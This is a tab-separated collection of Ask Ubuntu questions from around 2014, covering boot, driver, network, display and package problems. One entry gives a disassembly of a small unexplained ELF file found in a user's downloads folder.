481164	lucid update freezes firefox and chrome can not play youtube	strange things happening to lucid after an update around 06/06/2014 ( related to openssl or not , i wo n't spend more time on it ) . more like a hint , i guess . i had firefox , chrome misbehaving . firefox would freeze when no network connections were active and clicking on anything on the menu bar . chrome gave up on youtube play/download . other ppl reported strange things with ssh , like dbus bailing out . i guess i saw something similar , i am not sure . but , worth a try : turn off sound completely ( until things get fixed , if ever , since lucid is out of lts ) . all sorts of things want access to sound/alsa . i ran firefox in gdb and via strace and i saw that it freezes when asking for sound service . ( even when no actual sounds is to be made . ) yet another clue : canonical seems to have special updates and back-ports for alsa . paste trouble is a good predictor .
481165	automatic switch between the wifi and ethernet in linux using command line	i want to switch between the wifi and ethernet in linux ( ubuntu 10.04 ) . i have searched many ways and i found it can be done using firestarter â autoswitch between wired and wireless networks . for this i need to install the firestarter package in ubuntu . is this the correct way for switching between eth0 and wifi ? i wanted to implement it using command line without installing any new packages . please help . thanks in advance
481166	virtualization does not work ?	hi to all my fellow techies ... i virtualized my win2k8 server using vcenter standalone hoping that i could run the virtualized server on ubuntu using either virtual box or vmm for linux . vmm does not support vmdx so it does not even start the virtual server . i converted the vmdx file to vhd but no luck . on the other hand virtual box open up the server but after the initial black screen i get a blue screen and thats the end . any help is appreciated . i am right now stuck & feel like facing a wall ... . please help
481167	i 'm confused on installation	i downloaded ubuntu 64-bit for windows 8.1 , and on that little .exe file where it said restart to test and see ubuntu , i restarted and nothing happened . i 'm confused .
481168	usb port not working for ubuntu 14.04 lts	i have recently installed ubuntu 14.04 lts on my system . but the usb port does not seem to be working . when i type lsusb in terminal , following is displayed on the screen : bus 002 device 114 : id 0951:1665 kingston technology bus 002 device 004 : id 413c:2106 dell computer corp. dell quietkey keyboard bus 002 device 003 : id 04ca:0062 lite-on technology corp . bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub . however the disk utility shows no media . kindly help me on this . suggestions will be appreciated .
481170	serial ports not working	i am having issues getting my console db9 serial ports to work on an ubuntu 14.04 lts machine . i have a megabyte motherboard , an intel pentium processor , and a 2-port db9 serial card . i am attempting to use minicom , and have changed tty interfaces and speeds , but so far , i am unable to get either serial port working . $ sudo dmesg | grep tty [ 0.000000 ] console [ tty0 ] enabled [ 0.659627 ] 00:08 : ttys0 at i/o 0x3f8 ( irq = 4 , base_baud = 115200 ) is a 16550a [ 0.683157 ] 0000:04:00.0 : ttys4 at i/o 0xd030 ( irq = 17 , base_baud = 115200 ) is a st16650v2 [ 0.705481 ] 0000:04:00.1 : ttys5 at i/o 0xd020 ( irq = 18 , base_baud = 115200 ) is a st16650v2 [ 1.073980 ] tty ptmx : hash matches when i attempt to connect , the is no input/output visible in the screen . just the normal minicom displayed text and a blinking cursor . the cable is correct , as it works on another ubuntu machine . does anyone have any ideas on how to get this working ? thanks , jack
481179	download ubuntu packages	i 'm trying to download http : //apt.ubuntu.com/p/v-mobile-broadband from firefox on ubuntu 14.04 , but it give me a prompt that says choose the application to open the downloaded file , so i do n't know what i should choose and why when installing other things from other websites it start download normally ?
481180	problem after installing phpmyadmin in ubuntu 12.04	i have installed phpmyadmin from the following process sudo apt-get install phpmyadmin then i opened it throghhttp : //localhost/phpmyadmin/ but after giving username and password then pressing the 'log in ' button the following errors are occurring # 1045 can not log in to the mysql server connection for controluser as defined in your configuration failed what shall i do ?
481182	is there any shortcut key to align code in geany editor ?	am using geany editor in ubuntu 13.10 , is there any shortcut key to align code ( auto-alignment ) in geany editor ? for example : in eclipse - ctrl+shift+f to invoke the auto formatter
481183	how to repair/unlock gsettings ( or dconf-editor ) ?	btrfs is a nice filesystem , except when you are forced to hard reset the system twice in a row . in that case , all recently made changes to the files on the filesystem are broken in one way or another . among theese there is always the linux registry , dconf . so after the computer hard restart , you are left in a state of the broken dconf - all values are forced to the defaults , and you are banned from doing any modification to them . removing the whole /home/ $ user folder and re-creating it from scratch fixes the problem . but that takes a huge amount of time and loses even more data . i wonder , if there is a better way to repair or reset the dconf . preferably with the option to inspect the old values . i expect , that there is some backup of dconf settings , just like in windows word .
481184	logitech c920 still image resolution	greetings i am using a logitech c920 web cam for taking stills using guvcview at the moment , and was wondering what the best settings are for still images ? despite trying numerous different resolutions & formats , all of the photos seem to be coming out looking the same , ( meaning that while comparing the photos that were taken at different resolutions there seems to be the same amount of distortion when zoomed in at the same zoom level ) . are there the same amount of pixels at the different resolutions ? if so , why do all the images look the same quality ?
481186	could not login to x-server	i have 3 user account in system with kde and xfce . in x-server i can not login with all created users . in terminal after restart x-server and kdm or xfce i do not get any error . login interminal not problem but i can not login with kde or xfce . orxfce` .
481191	ubuntu 14.04 uefi wo n't boot after upgrade from 13.10	upgrading from ubuntu 13.10 to ubuntu 14.04 has resulted in a system that is not bootable . the system consists of two disks : one with windows 8 ( /dev/sdax ) and one with ubuntu 14.04 ( /dev/sdbx ) . i was previously booting using an efi partition /dev/sda2 , but the ubuntu upgrade installer has rendered this inoperative : it fails to a gparted fallback screen . /dev/sdb was originally a legacy mbr/bios-based system . i have attempted to create an efi partition on /dev/sdb1 , but i am not sure if i did it right . boot-repair fails to fix either efi partition . both windows and ubuntu are bootable with the assistance of super grub disk , but that is only the way i can get either system to boot . secure boot is not enabled . boot information is here : http : //paste.ubuntu.com/7622020/ do you have any recommendations for me ? this looks like the bug given in https : //bugs.launchpad.net/ubuntu/+source/grub2/+bug/1289977 , but there is no clear resolution available .
481192	partitioning for ubuntu	my pc has only one operating system installed : windows 7 on single partition c : . is it necessary to partition it before installing ubuntu alongside with windows 7 or can i simply install ubuntu in the same partition ?
481196	unable to login as user using gnome session	i am using ubuntu gnome 14.04 with gnome3 team 's gnome3-staging ppa and now unable to login ( as user ) because of an issue about dbus . i know that because trying sudo restart dbus takes forever . however , login as root ( from ctrl-alt f1 console , i have enabled root account ) followed by startx /usr/bin/gnome-shell works at least partially . gnome terminal would not work because it could not register itself via ( the missing ) session bus . my display manager is gdm 3.12 . my init daemon is upstart , however trying systemd gives the same failure .
481198	wireless not working on ubuntu 14.04	just installed ubuntu 14.04 on my compaq presario v2069cl notebook pc , the wireless does not work . what is the command to install the wireless driver ? the broadcom model is bcm4318 ( using lspci -vvnn | grep 14e4 ) .
481200	use of ppa to send simple updates	i wish to setup a ppa to send simple changes to several hundreds of ubuntu 12.04 machines in the field . simple changes mean that bash script changes and configuration file updates and possibly other software updates including new software installations that can be installed via apt-get install . several questions that have come up to my mind are , can ppa be used to send script updates ? can i configure client machines to get updates only from this ppa and install them automatically just like unattended-upgrades ? ( of course i know this option is possible but a good set of tools to achieve this is expected ) . i know this is a broad question , but an answer with few pointers is highly appreciated .
481201	how to install plugins in banshee music player ?	is there any way to install plugins ( clutterflow to be specfic ) with their dependencies in banshee , because i am not able to install any extensions in banshee .
481208	error libx264 not found	i follow this installation guide . at step 3 ( install dependencies ) : sudo ./licode/scripts/installubuntudeps.sh in terminal i got error in terminal : error libx264 not found why i got this error , and how to solve it ?
481210	many functions are not appearing in my system settings	when i tried to enter network settings through system settings , i could n't found it . not only network settings..many functions are not appearing . whats the problem ? i am using ubuntu 14.04 lts x64 bit .
481213	dual boot : windows 7 partition deleted after kubuntu 14.04 install ... weird !	i 've bought two new ssd 's in order to install kubuntu on one and win 7 on the other one . before i had linux mint and win7 together one just one ssd . so first i installed win7 as recommended , and then used the guided installer of kubuntu to install kubuntu . i selected the second ssd , chose the option `` use entire disk and install '' , but to my surprise after rebooting and selecting win7 boot loader from grub2 , i got a prompt that my windows installation is damaged , and i need to run the repair option from the installation disk . so i booted into kubuntu again , fired up kparted and saw that indeed my windows partition got deleted , except the recovery partition . i do n't understand what happened . i am not new to this topic , and this was not my first time installing ubuntu alongside windows . i have never ever had that problem . what can i do to make sure this wo n't happen again , so i wo n't waste another 2 hours of my life ? thanks a lot !
481217	ubuntu full installation on chromebook	guys i am quite new here : ) i just bought a google chromebook hp 14 and i am very happy to be honest . but i do miss my ubuntu os : ) , and the options available to use are n't a real native os system but adaptations that sometimes do not work : ( does anyone have an idea how to install with dual boot ubuntu alongside chrome os . ( i hope i am not repeating any questions here ) thank so much for your time guys : ) gustavo
481220	strange white borders on overlay icons on avant-window-navigator	since recently , i started seeing strange white borders around overlay icons on the awn dock ( e.g . the small icon under the main icon indicating that a window is open ) - see the screenshot : quitting awn and restarting did n't help , and neither did uninstalling and reinstalling awn . if i restart the computer , these white borders are no longer present - but after an hour or so they reappear . they do n't get in a way of any functionality , but just look ugly . does anybody know how to get rid of them ? i 'm using ubuntu 12.04 lts , awn version 0.4.1~git20131105 ( installed from ppa ) .
481222	how to install wifi driver in dell inspiron 15r 5521 ?	i just dual booted my laptop , dell inspiron 15r 5521 , with ubuntu . but the wireless driver is not showing . i 'm new in ubuntu so help me with fully detailed commands to install the wireless driver centrino wireless-n 2230 .
481223	where is launcher.qml in ubuntu 14.04 ?	where is/usr/share/unity-2d/shell/launcher/launcher.qml ( from 12.04 ) located in ubuntu 14.04 ?
481225	launchpad duplicated and screen splited	after my last update of ubuntu , as i usually do , when i restarted the pc , the desktop appears duplicaded , including the launchpad . it 's impossible to work since every app i open is replicated in the right side of the screen . i do n't have two monitors and ubuntu 12.04 is running using vmplayer . any idea to solve this problem ? thank you for your help .
481228	is there a dedicated copy application for ubuntu ?	am searching for an app like teracopy . nemo , nautilus , have a pretty simplistic way of showing what is being copied . i do n't really like that , as i wan na see what is being copied live .
481229	gnome classic , compiz and panels	i have compiz installed on ubuntu 14.04 running gnome classic with window decoration enabled . to enable compiz i can type compiz -- replace but the panel at the top disappears . does anyone know how to fix that ?
481232	grub rescue and unknown filesystem	my hard disk ubuntu 12.04 started showing grub rescue , unknown file system ... i have used 'ls ' to check the partitions ( hd0 , hd0,5 and hd0,1 ) but none of the partitions is allowing me to boot from it . i have a bootable usb with mint on it , can i use it to view my faulty hard disk with ubuntu 12.04 ?
481233	in ubuntu 14.04 the theme does not load correctly if autologin is enabled	well , the title describes my problem . if i disable auto login then everything works fine . if i enable it , the theme does n't show up correctly after booting . if i logout and login again , then it works . this happens even with the radiance theme . the window title bars appear dark after booting , however after logout and login the radiance theme shows up as it should . any idea ? thanks for the help
481234	can the os be the problem that makes my pc not show correctly ?	let me explain what i mean by showing incorrectly : http : //m.imgur.com/xfarnne i run ubuntu 14.04 , i updated the software througj the automatic updater and after restarting this happened . it is impossible for me to navigate through guis or use the screen at all . it is not a hardware problem , checked by connecting pc to other screens and they all had the same problem . is there any solution besides reinstalling the os to fix this ?
481235	screen on ubuntu 14.04 shows up cropped as soon as i log in	i have two users on ubuntu 14.04 , the screens on both of them show up randomly and more and more frequently , cropped on both sides as soon as i log in . before that the screen is all good and spanned across my laptop screen . the reason why i have two user is because the screen started showing up cropped on one so i tried creating another user and that worked fine until now . lately i have n't even been able to log in to one of the users ( the first one ) . any help is appreciated . thanks vedant
481236	upstart not reopening log files on logrotation	we use upstart to manage our services on our ubuntu servers . they produce logs which are logged out to /var/log/upstart/service_name.log then daily , the log files are rotated using the logrotation script which comes with 12.04 lts : /var/log/upstart/*.log { daily missingok rotate 7 compress notifempty nocreate } the problem is that while logrotate moves the files , it does n't appear to signal to upstart to close and reopen the files , leaving the upstart process writing to a delete pid . init 1 root 8w reg 202,1 64 2431 /var/log/upstart/dbus.log.1 ( deleted ) init 1 root 13w reg 202,1 95 2507 /var/log/upstart/acpid.log.1 ( deleted ) init 1 root 14w reg 202,1 127 17377 /var/log/upstart/whoopsie.log.1 ( deleted ) init 1 root 36w reg 202,1 122 6747 /var/log/upstart/service_name.log.1 ( deleted ) init 1 root 37w reg 202,1 30 6762 obviously i could redirect the output from my own services to other log files , but the problem would still be there for the system processes . also i would rather not have to build more infrastructure than what i need .
481240	print manager in ubuntu 14.04 automatically adds all network printers to print view	after upgrading from 12.04 to 14.04 the print manager automatically added all network printers to my print view . under 12.04 only those network printers where shown which i actually added manually . this is kind of annoying because now i have to scroll myself through a huge list of printers in order to choose the one i need . how can i disable this feature and force ubuntu to show only the printers that i added manually ?
481241	what is difference between sudo apt-get install and sudo apt install	i installed many packages from sudo apt-get install but when i typed sudo apt -- help it gave a direct option of doing installation by sudo apt install [ package name ] ... . so , what is the difference between the two ? is there any issues not using 'get ' in command ? ?
481243	vm player fail to load ?	i am have installed vm player on ubuntu 12.04 . every time i start player , it gives me an error : vmware kernal module updater `` before you can run vmware , serveral modules must be complied and loaded into the running kernel '' when i click `` install '' , its starts installing but it gives a error `` virtual machine communication interface '' and at `` vmci sockets '' , then player fails to load saying : unable to start the service ... i have exhausted all possible scenarios right now it has got me 4 days on this error . please help
481246	tightvnc server - how to [ minimal cpu/latency ] for basic apps over 802.11n direct	greetings fellow tinkers , and people who ... `` fix '' things ... right then ! so i have a nexus 5 in a chrooted ubuntu 14.04 that i want to export the display from to a 10 inch tablet via wifi - and before you ask , im not using the tablet as the host , because the nexus is faster . - i had considered xserver xsdl as an option , alas , it is retarded* on wifi . *retarded : literal definition . - i need this setup to function as a light development platform . # basically , linux tools on the go ; testdisk , mono , android utilities , etc ... tightvnc , appears my most viable option . # ( i cant use slimport because the nexus needs a free otg for a powered hub ) . what do you think ? am i right going with tvnc or is there some obscure tool that i am ignorant to ; that would answer this question in summary ? thankyou , for being such a skilled reader and getting to this point .
481248	there are some remaning files after performing autoremove	i have installed many programs and noticed that if suppose installation is of 900kb and after removing that installed package it gives 577kb removed where does the 377kb has gone ? ? if it is in system how to remove the additional data files ? ?
481249	after installing many new fonts , web fonts became ugly	after installing many new fonts ( without caring or writing the installed fonts somewhere ) , my web fonts became ugly . here 's a picture : look , for example , at the bold fonts of the titles , and at the question counter on the top right . i have browsed through ask ubuntu to find answers , but could n't find any relevant one - i have not installed any package with the name infinality in it ; i have not installed kde-standard ; and i have not installed any new graphic card drivers lately . terminal fonts look the same . i am using firefox with serif as the default font ( i have not manually selected it ) .
481250	permission denied error while creating file by using script file	i have created a script file called black_list.sh . # ! /bin/bash default_card=`head -1 /proc/asound/modules` echo $ default_card if [ ! -e /etc/modprobe.d/sound.blacklist.conf ] & & [ [ `` $ default_card '' =~ `` snd_hda_intel '' ] ] ; then echo `` blacklist snd_hda_intel '' > /etc/modprobe.d/sound.blacklist.conf -- - > not working else echo `` default sound card ( snd_hda_intel ) is already added in black list '' ; fi from this script file i am creating sound.blacklist.conf file in /etc/modprobe.d but i got /etc/modprobe.d/sound.blacklist.conf : permission denied error . so tried echo itsme | sudo -s echo `` blacklist snd_hda_intel '' > /etc/modprobe.d/sound.blacklist.conf but it also not worked so how can create a file in /etc/modprobe.d directory from my script file .
481251	qle2462 fiberchannel hba driver for ubuntu 12.04 server	greetings ! ! has anybody successfully installed qle2462 fiberchannel to pcie hba driver for ubuntu12.04 server ? does ubuntu automatically detect the device and install driver ? thanks
481257	recent update broke unity on two of my installs	when booting , the login screen shows up normally , but after logging in all i see is my wallpaper . no panel or launcher . i can open my guake terminal with my keyboard shortcut which allows me to launch other applications which look a little different ( unity 2d ? ) , but that 's about it . i have two 14.04 installs on my laptop . my first install broke about a week or two ago after rebooting from an update , so i booted into my other partition and it worked fine , even after running an update and rebooting many times . today i rebooted after a new update and the exact same thing has happened to this install . i tried many things last time , purging nvidia drivers and letting mesa run , reinstalling the nvidia drivers . nothing seemed to help . any ideas ?
481258	about programming multi-pointer apps	it could seem stupid , i am a noob in programming , but here is the question : i search multi-pointer applications in the web ( desktop , web , terminal , whatever ) , specifically not multi-touch but apps that support multiple mice ( multi pointer ) are very scarce . the well-known options in multi-touch are android , ios , and some others too , but i wan na multi-pointer ( 2 mices ) . where can i find the answer for programming multi-pointer apps ? ... in programming language level ? ... in operating system level ? ... maybe is better learn to program in a multi-touch language and period xd ... other alternative ? any hint is welcomed . pd : one can have 2 mice in ubuntu with the command `` xinput '' , but one ca n't really take advantage of it in a useful way .
481263	graphic issues with installing ubuntu on pc with radeon 7770	have n't found anything about the issue i 'm experiencing and would like someone to help me with it . i 'm trying to install ubuntu 14.04 , but for some reason installation does load , but i get on monitor tiles of size 4px by 8px in zig-zag black/orange and ca n't see anything from them . managed somehow to get to select screen , but that is where issues start since i ca n't discern what option is what . anyone has idea how to fix it ? see screenshot below :
481266	is there any way of adding an dsn in ubuntu ?	i am using java-jdbc and mysql is my database.. i want to have some standard odbc dsn like in windows ... .is there a way of setting dsn ( data source name ) in ubuntu for mysql/odbc drivers ? ?
481267	unable to get group chat requests in skype	i am unable to get the group chat request in skype in ubuntu os from yesterday on words even the other person added me in group did n't get any request from that group.please let me know do i need to change any settings
481268	how do i enable automatic history expansion for commands using 'magic space ' ?	i read on a blog somewhere about the possibility to use automatic history expansion before actually executing a command or even pressing the enter key in the command line . it involves the 'magic-space ' and creating an ~/.inputrc configuration file . what should that file contain exactly and when is it read ( in login and non-login bash shells ) ?
481272	is there a scanner for scanning unused files in my system ?	i have installed/un-installed many packages ( as trial ) in my system as a result they leave a lot of junk and temporary files ... is there any package or software that can scan for removable junk and remove it out of my system ? ?
481273	myterious a.out file appeared in downloads folder	yesterday a file that should not exist appeared in my downloads folder . virustotal knows the file since 2012 and reports it as clean - but it seems other people have had it appear . does anyone know more ? anyone else seen this ? i assume it 's harmless and caused by a bug , but maybe not ? file : a.out 1759 bytes md5 f61595bec6cc87903ce1677723c878cb sha1 fbe66f197516eed6bb357db1bb19ed0d2c3d8fa8 sha256 e20c67711743553e16501b65a9921f59643edafd32d46e37f916d43e0023ffc3 ssdeep 12 : bvw/bg0scb46s4czclqj/dxri2+1e2x3ve6xvz6txcq/+/39wuz8kvxmnikezgfe : gfe6s+u+nhdx+tmqqmomw disassembly : a.out : file format elf64-x86-64 disassembly of section .interp : 0000000000400158 < .interp > : 400158 : 2f ( bad ) 400159 : 6c insb ( % dx ) , % es : ( % rdi ) 40015a : 69 62 2f 6c 64 36 34 imul $ 0x3436646c,0x2f ( % rdx ) , % esp 400161 : 2e 73 6f jae , pn 4001d3 < _global_offset_table_+0x4001d3 > 400164 : 2e 31 00 xor % eax , % cs : ( % rax ) disassembly of section .hash : 0000000000400168 < .hash > : 400168 : 01 00 add % eax , ( % rax ) ... disassembly of section .dynstr : 0000000000400178 < .dynstr > : 400178 : 00 6c 69 62 add % ch,0x62 ( % rcx , % rbp,2 ) 40017c : 72 74 jb 4001f2 < _global_offset_table_+0x4001f2 > 40017e : 2e 73 6f jae , pn 4001f0 < _global_offset_table_+0x4001f0 > 400181 : 2e 31 00 xor % eax , % cs : ( % rax ) disassembly of section .eh_frame : 0000000000400188 < .eh_frame > : 400188 : 14 00 adc $ 0x0 , % al 40018a : 00 00 add % al , ( % rax ) 40018c : 00 00 add % al , ( % rax ) 40018e : 00 00 add % al , ( % rax ) 400190 : 01 7a 52 add % edi,0x52 ( % rdx ) 400193 : 00 01 add % al , ( % rcx ) 400195 : 78 10 js 4001a7 < _global_offset_table_+0x4001a7 > 400197 : 01 1b add % ebx , ( % rbx ) 400199 : 0c 07 or $ 0x7 , % al 40019b : 08 90 01 00 00 24 or % dl,0x24000001 ( % rax ) 4001a1 : 00 00 add % al , ( % rax ) 4001a3 : 00 1c 00 add % bl , ( % rax , % rax,1 ) ... 4001ae : 00 00 add % al , ( % rax ) 4001b0 : 00 0e add % cl , ( % rsi ) 4001b2 : 10 46 0e adc % al,0xe ( % rsi ) 4001b5 : 18 4a 0f sbb % cl,0xf ( % rdx ) 4001b8 : 0b 77 08 or 0x8 ( % rdi ) , % esi 4001bb : 80 00 3f addb $ 0x3f , ( % rax ) 4001be : 1a 3b sbb ( % rbx ) , % bh 4001c0 : 2a 33 sub ( % rbx ) , % dh 4001c2 : 24 22 and $ 0x22 , % al 4001c4 : 00 00 add % al , ( % rax ) ... disassembly of section .dynamic : 00000000006001c8 < _dynamic > : 6001c8 : 01 00 add % eax , ( % rax ) 6001ca : 00 00 add % al , ( % rax ) 6001cc : 00 00 add % al , ( % rax ) 6001ce : 00 00 add % al , ( % rax ) 6001d0 : 01 00 add % eax , ( % rax ) 6001d2 : 00 00 add % al , ( % rax ) 6001d4 : 00 00 add % al , ( % rax ) 6001d6 : 00 00 add % al , ( % rax ) 6001d8 : 04 00 add $ 0x0 , % al 6001da : 00 00 add % al , ( % rax ) 6001dc : 00 00 add % al , ( % rax ) 6001de : 00 00 add % al , ( % rax ) 6001e0 : 68 01 40 00 00 pushq $ 0x4001 6001e5 : 00 00 add % al , ( % rax ) 6001e7 : 00 05 00 00 00 00 add % al,0x0 ( % rip ) # 6001ed < _dynamic+0x25 > 6001ed : 00 00 add % al , ( % rax ) 6001ef : 00 78 01 add % bh,0x1 ( % rax ) 6001f2 : 40 00 00 add % al , ( % rax ) 6001f5 : 00 00 add % al , ( % rax ) 6001f7 : 00 06 add % al , ( % rsi ) 6001f9 : 00 00 add % al , ( % rax ) 6001fb : 00 00 add % al , ( % rax ) 6001fd : 00 00 add % al , ( % rax ) 6001ff : 00 78 01 add % bh,0x1 ( % rax ) 600202 : 40 00 00 add % al , ( % rax ) 600205 : 00 00 add % al , ( % rax ) 600207 : 00 0a add % cl , ( % rdx ) 600209 : 00 00 add % al , ( % rax ) 60020b : 00 00 add % al , ( % rax ) 60020d : 00 00 add % al , ( % rax ) 60020f : 00 0c 00 add % cl , ( % rax , % rax,1 ) 600212 : 00 00 add % al , ( % rax ) 600214 : 00 00 add % al , ( % rax ) 600216 : 00 00 add % al , ( % rax ) 600218 : 0b 00 or ( % rax ) , % eax 60021a : 00 00 add % al , ( % rax ) 60021c : 00 00 add % al , ( % rax ) 60021e : 00 00 add % al , ( % rax ) 600220 : 18 00 sbb % al , ( % rax ) 600222 : 00 00 add % al , ( % rax ) 600224 : 00 00 add % al , ( % rax ) 600226 : 00 00 add % al , ( % rax ) 600228 : 15 00 00 00 00 adc $ 0x0 , % eax ... did not run compile jobs at that time . ubuntu 12.04.04 lts 64bit . file appeared while downloading packages from sourceforge with firefox . bears same timestamp as one of the downloads . computer is connected to internet via router w/ firewall . i am certain the file is not of my own creation . browser does not show any downloads apart from the ones i initiated . no site likely to infect visited at that point in time - unless nixnote 's sourceforge page got hacked . stat reveals nothing of note , no birth date set . readelf output : elf header : magic : 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 class : elf64 data : 2 's complement , little endian version : 1 ( current ) os/abi : unix - system v abi version : 0 type : exec ( executable file ) machine : advanced micro devices x86-64 version : 0x1 entry point address : 0x0 start of program headers : 64 ( bytes into file ) start of section headers : 744 ( bytes into file ) flags : 0x0 size of this header : 64 ( bytes ) size of program headers : 56 ( bytes ) number of program headers : 5 size of section headers : 64 ( bytes ) number of section headers : 10 section header string table index : 7 section headers : [ nr ] name type address offset size entsize flags link info align [ 0 ] null 0000000000000000 00000000 0000000000000000 0000000000000000 0 0 0 [ 1 ] .interp progbits 0000000000400158 00000158 000000000000000f 0000000000000000 a 0 0 1 [ 2 ] .hash hash 0000000000400168 00000168 000000000000000c 0000000000000004 a 3 0 8 [ 3 ] .dynsym dynsym 0000000000400178 00000178 0000000000000000 0000000000000018 a 4 1 8 [ 4 ] .dynstr strtab 0000000000400178 00000178 000000000000000c 0000000000000000 a 0 0 1 [ 5 ] .eh_frame progbits 0000000000400188 00000188 0000000000000040 0000000000000000 a 0 0 8 [ 6 ] .dynamic dynamic 00000000006001c8 000001c8 00000000000000d0 0000000000000010 wa 4 0 8 [ 7 ] .shstrtab strtab 0000000000000000 00000298 000000000000004c 0000000000000000 0 0 1 [ 8 ] .symtab symtab 0000000000000000 00000568 0000000000000138 0000000000000018 9 9 8 [ 9 ] .strtab strtab 0000000000000000 000006a0 000000000000003f 0000000000000000 0 0 1 key to flags : w ( write ) , a ( alloc ) , x ( execute ) , m ( merge ) , s ( strings ) , l ( large ) i ( info ) , l ( link order ) , g ( group ) , t ( tls ) , e ( exclude ) , x ( unknown ) o ( extra os processing required ) o ( os specific ) , p ( processor specific ) there are no section groups in this file . program headers : type offset virtaddr physaddr filesiz memsiz flags align phdr 0x0000000000000040 0x0000000000400040 0x0000000000400040 0x0000000000000118 0x0000000000000118 r e 8 interp 0x0000000000000158 0x0000000000400158 0x0000000000400158 0x000000000000000f 0x000000000000000f r 1 [ requesting program interpreter : /lib/ld64.so.1 ] load 0x0000000000000000 0x0000000000400000 0x0000000000400000 0x00000000000001c8 0x00000000000001c8 r 200000 load 0x00000000000001c8 0x00000000006001c8 0x00000000006001c8 0x00000000000000d0 0x00000000000000d0 rw 200000 dynamic 0x00000000000001c8 0x00000000006001c8 0x00000000006001c8 0x00000000000000d0 0x00000000000000d0 rw 8 section to segment mapping : segment sections ... 00 01 .interp 02 .interp .hash .dynsym .dynstr .eh_frame 03 .dynamic 04 .dynamic dynamic section at offset 0x1c8 contains 8 entries : tag type name/value 0x0000000000000001 ( needed ) shared library : [ librt.so.1 ] 0x0000000000000004 ( hash ) 0x400168 0x0000000000000005 ( strtab ) 0x400178 0x0000000000000006 ( symtab ) 0x400178 0x000000000000000a ( strsz ) 12 ( bytes ) 0x000000000000000b ( syment ) 24 ( bytes ) 0x0000000000000015 ( debug ) 0x0 0x0000000000000000 ( null ) 0x0 there are no relocations in this file . there are no unwind sections in this file . symbol table '.dynsym ' contains 0 entries : num : value size type bind vis ndx name symbol table '.symtab ' contains 13 entries : num : value size type bind vis ndx name 0 : 0000000000000000 0 notype local default und 1 : 0000000000400158 0 section local default 1 2 : 0000000000400168 0 section local default 2 3 : 0000000000400178 0 section local default 3 4 : 0000000000400178 0 section local default 4 5 : 0000000000400188 0 section local default 5 6 : 00000000006001c8 0 section local default 6 7 : 00000000006001c8 0 object local default 6 _dynamic 8 : 0000000000000000 0 object local default 6 _global_offset_table_ 9 : 0000000000600298 0 notype global default abs _edata 10 : 0000000000600298 0 notype global default abs _end 11 : 0000000000000000 0 notype global default und _start 12 : 0000000000600298 0 notype global default abs __bss_start histogram for bucket list length ( total of 1 buckets ) : length number % of total coverage 0 1 ( 100.0 % ) no version information found in this file .
481276	previous frame seems to flicker in any type of window	recently my 14.04 setup has run into some strange problem . basically almost all windows ( often ) start flickering the `` previous frame '' ( or that is what it feels like ) . there does n't seem to be any logic when it starts to flicker . it sometimes calms down after you leave it be for a moment . sometimes pressing enter several times in the terminal window helps . it affects terminal windows , gtk windows and pdf readers . browsers seem unaffected by this , though . some other apps are also unaffected , ie . spotify . i have uploaded a video of this from a terminal window , but basically the same thing happens with other type of windows as well . the video can be seen here : link to youtube video showing the symptoms it 's a fairly recent fresh install of ubuntu 14.04 , and i have nvidia gtx 560 video card . i have updated to newest drivers 337.25 . any ideas what might be causing this ?
481280	serious errors while checking the disk drive found ubuntu	**please help me : ( error : serious errors while checking the disk drive found write wrong , sorry . because my turkish .
481281	canon mp237 can print but can not scan	i have this cannon mp237 ( 3-in-1 ) printer and i can print properly using the software on ubuntu 14.04 . however , i can not scan with it . i even tried gimp image editor but i still can not do any scanning . the copy function of the printer works well so i 'm sure it 's a software issue . please advise , thanks .
481282	ca n't use two network interfaces at the same time	i have a problem . first of all , i wan to set up a server on ubuntu 14.04 . i have 2 interfaces : eth0 for dhcp server and eth1 for internet connection . but if i connect to two networks at the same time , there is n't internet on pc . so i have to choose between server and internet . that 's terrible , can anyone tell me how to close this issue ? /etc/network/interfaces : auto lo eth0 eth1 iface lo inet loopback iface eth0 inet static address 172.16.1.100 netmask 255.255.255.0 broadcast 172.16.1.255 gateway 172.16.1.254 sudo route outputs : kernel ip routing table destination gateway genmask flags metric ref use iface default 192.168.0.1 0.0.0.0 ug 0 0 0 eth1 192.168.0.0 * 255.255.255.0 u 1 0 0 eth1 upd : ifconfig outputs : eth0 link encap : ethernet hwaddr 90 : e6 : ba:46:1d:50 inet6 addr : fe80 : :92e6 : baff : fe46:1d50/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:1110 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:184287 ( 184.2 kb ) eth1 link encap : ethernet hwaddr 00:04:75:98:5f : da inet addr:192.168.0.101 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :204:75ff : fe98:5fda/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:14498 errors:0 dropped:0 overruns:2 frame:0 tx packets:13096 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:9710708 ( 9.7 mb ) tx bytes:1840400 ( 1.8 mb ) interrupt:18 base address:0x4c00 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:4398 errors:0 dropped:0 overruns:0 frame:0 tx packets:4398 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:527890 ( 527.8 kb ) tx bytes:527890 ( 527.8 kb )
481287	want to connect sony z2 ( android phone ) to ubuntu 12.04	i have ubuntu 12.04 and i try to connect it with sony xperia z2 ( which has android 4.4 ) via usb . i have set mass storage mode ( msc ) setting but nothing happens when i connect cell phone to the laptop .
